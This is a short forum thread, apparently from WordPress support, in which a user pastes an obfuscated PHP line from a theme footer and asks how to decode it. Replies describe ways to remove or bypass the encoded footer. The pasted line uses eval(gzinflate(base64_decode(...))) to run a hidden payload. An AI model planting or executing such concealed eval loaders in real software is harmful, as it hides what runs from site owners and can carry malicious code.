• Someone pls help me decode the base 64 code below :

    <?php $E1d48d469be213db929aa42c15a487150=’jVJdT8IwFH2GxP9w0wfAByjRFyP7iMEHTTQhkYhvpNsuW2Vbm7awkPjPfPAn+RdsRzZCEOPL7m3PuT3ndA2D78+vTsdL+BbinGntkzhHpkjgUbsXXHQ7h+YvksN44pOVEAYtYveOBni5ErFCXNshBpnClU8yY+QtpVVVjVp4FIuCgOEmR58sMIIZSxHuUfO0JEGvjLSceJQdlI9tCbmzLFcmcDUe38AQvFBmEqJcpE5k0C9Zgf3LCYSBBbkGqcQmyXcgRYUKE4h28JvDSqhEKtR6JFRKgoVdztyyNhMpoP/IFdhAmpsmjxt1co+WNHUk+DiRThUy02qbDAvU+7OmDuFlCnewaHCYO8L5+9mynCckeHXlROqdp5rZoNcuIY21HtZ0ZoSibRduFPf3V4pxJiBFsxTScFEO+plobpZaey8vdb4eK+TkRKs9r5XLMF5TS7H/wD6ft4f589NRjqbZ13Nfi9feKrncv8RB7ceNRSLZ1U1mirwhdn8A’;eval(gzinflate(base64_decode($E1d48d469be213db929aa42c15a487150))); ?>

    Any kind of help would be appreciated !!! thnks!!!

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  • The FAQ, How to get rid of encoding in a theme’s footer? explains how to get rid of that coding but also has links to topics that will help you.

    Hello to everybody. Is all the morning that I’m trying to decode or delete in some way my “double” base64 coding….I tried every thing, nothing…. and, unvelible, (in my template is working ok) I just deleted the command “get header” and “get footer” from index, page, search, etc. an I replaced them with a command “include”. I designed my footer (you can easily change the original one too removing completely the base 64 code using Dreamweaver or similar) and every thing works great.
    I cannot believe it. I lost 5 hours and the solution was there!

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